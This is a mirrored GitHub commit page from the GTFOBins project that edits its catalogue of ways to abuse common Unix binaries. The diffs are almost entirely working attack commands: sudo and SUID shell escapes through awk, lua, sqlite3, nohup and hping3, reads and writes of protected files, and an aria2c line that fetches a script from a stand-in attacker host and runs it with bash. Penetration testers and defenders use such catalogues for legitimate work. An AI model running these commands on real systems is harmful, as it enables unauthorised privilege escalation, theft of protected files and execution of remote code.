public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-10-31 16:58:36 +01:00
Code Issues Projects Releases Wiki Activity

Minor fixes to SUID mainly

Browse Source
This commit is contained in:
Andrea Cardaci
2021-01-18 09:23:50 +01:00
committed by GitHub
parent 5c4ec744cb c85513d5a6
commit eba354eda0
12 changed files with 47 additions and 16 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
_gtfobins/aria2c.md
View File

@@ -10,13 +10,6 @@ functions:
aria2c --on-download-error=$TF http://x aria2c --on-download-error=$TF http://x
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID. - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
suid:
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
./aria2c --on-download-error=$TF http://x
sudo: sudo:
- code: | - code: |
COMMAND='id' COMMAND='id'
@@ -24,4 +17,11 @@ functions:
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
sudo aria2c --on-download-error=$TF http://x sudo aria2c --on-download-error=$TF http://x
limited-suid:
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
./aria2c --on-download-error=$TF http://x
--- ---

4
_gtfobins/awk.md
View File

@@ -27,6 +27,10 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
awk '//' "$LFILE" awk '//' "$LFILE"
suid:
- code: |
LFILE=file_to_read
./awk '//' "$LFILE"
sudo: sudo:
- code: sudo awk 'BEGIN {system("/bin/sh")}' - code: sudo awk 'BEGIN {system("/bin/sh")}'
limited-suid: limited-suid:

5
_gtfobins/ed.md
View File

@@ -17,6 +17,11 @@ functions:
ed file_to_read ed file_to_read
,p ,p
q q
suid:
- code: |
./ed file_to_read
,p
q
sudo: sudo:
- code: | - code: |
sudo ed sudo ed

4
_gtfobins/gawk.md
View File

@@ -27,6 +27,10 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
gawk '//' "$LFILE" gawk '//' "$LFILE"
suid:
- code: |
LFILE=file_to_read
./gawk '//' "$LFILE"
sudo: sudo:
- code: sudo gawk 'BEGIN {system("/bin/sh")}' - code: sudo gawk 'BEGIN {system("/bin/sh")}'
limited-suid: limited-suid:

2
_gtfobins/hping3.md
View File

@@ -7,7 +7,7 @@ functions:
suid: suid:
- code: | - code: |
./hping3 ./hping3
/bin/sh /bin/sh -p
sudo: sudo:
- code: | - code: |
sudo hping3 sudo hping3

2
_gtfobins/lua.md
View File

@@ -59,6 +59,8 @@ functions:
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);' - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
file-read: file-read:
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
suid:
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
sudo: sudo:
- code: sudo lua -e 'os.execute("/bin/sh")' - code: sudo lua -e 'os.execute("/bin/sh")'
limited-suid: limited-suid:

8
_gtfobins/lwp-request.md
View File

@@ -4,12 +4,12 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
lwp-request "file://$LFILE" lwp-request "file://$LFILE"
suid:
- code: |
LFILE=file_to_read
./lwp-request "file://$LFILE"
sudo: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo lwp-request "file://$LFILE" sudo lwp-request "file://$LFILE"
limited-suid:
- code: |
LFILE=file_to_read
./lwp-request "file://$LFILE"
--- ---

4
_gtfobins/mawk.md
View File

@@ -10,6 +10,10 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
mawk '//' "$LFILE" mawk '//' "$LFILE"
suid:
- code: |
LFILE=file_to_read
./mawk '//' "$LFILE"
sudo: sudo:
- code: sudo mawk 'BEGIN {system("/bin/sh")}' - code: sudo mawk 'BEGIN {system("/bin/sh")}'
limited-suid: limited-suid:

4
_gtfobins/nawk.md
View File

@@ -27,6 +27,10 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
nawk '//' "$LFILE" nawk '//' "$LFILE"
suid:
- code: |
LFILE=file_to_read
./nawk '//' "$LFILE"
sudo: sudo:
- code: sudo nawk 'BEGIN {system("/bin/sh")}' - code: sudo nawk 'BEGIN {system("/bin/sh")}'
limited-suid: limited-suid:

4
_gtfobins/nmap.md
View File

@@ -85,7 +85,7 @@ functions:
file-write: file-write:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF echo 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
nmap --script=$TF nmap --script=$TF
- description: The payload appears inside the regular nmap output. - description: The payload appears inside the regular nmap output.
code: | code: |
@@ -94,7 +94,7 @@ functions:
file-read: file-read:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
nmap --script=$TF nmap --script=$TF
sudo: sudo:
- description: Input echo is disabled. - description: Input echo is disabled.

4
_gtfobins/nohup.md
View File

@@ -7,8 +7,8 @@ functions:
COMMAND='/usr/bin/id' COMMAND='/usr/bin/id'
nohup "$COMMAND" nohup "$COMMAND"
cat nohup.out cat nohup.out
suid:
- code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
sudo: sudo:
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
suid:
- code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
--- ---

8
_gtfobins/sqlite3.md
View File

@@ -14,6 +14,14 @@ functions:
.import $LFILE t .import $LFILE t
SELECT * FROM t; SELECT * FROM t;
EOF EOF
suid:
- code: |
LFILE=file_to_read
sqlite3 << EOF
CREATE TABLE t(line TEXT);
.import $LFILE t
SELECT * FROM t;
EOF
sudo: sudo:
- code: sudo sqlite3 /dev/null '.shell /bin/sh' - code: sudo sqlite3 /dev/null '.shell /bin/sh'
limited-suid: limited-suid: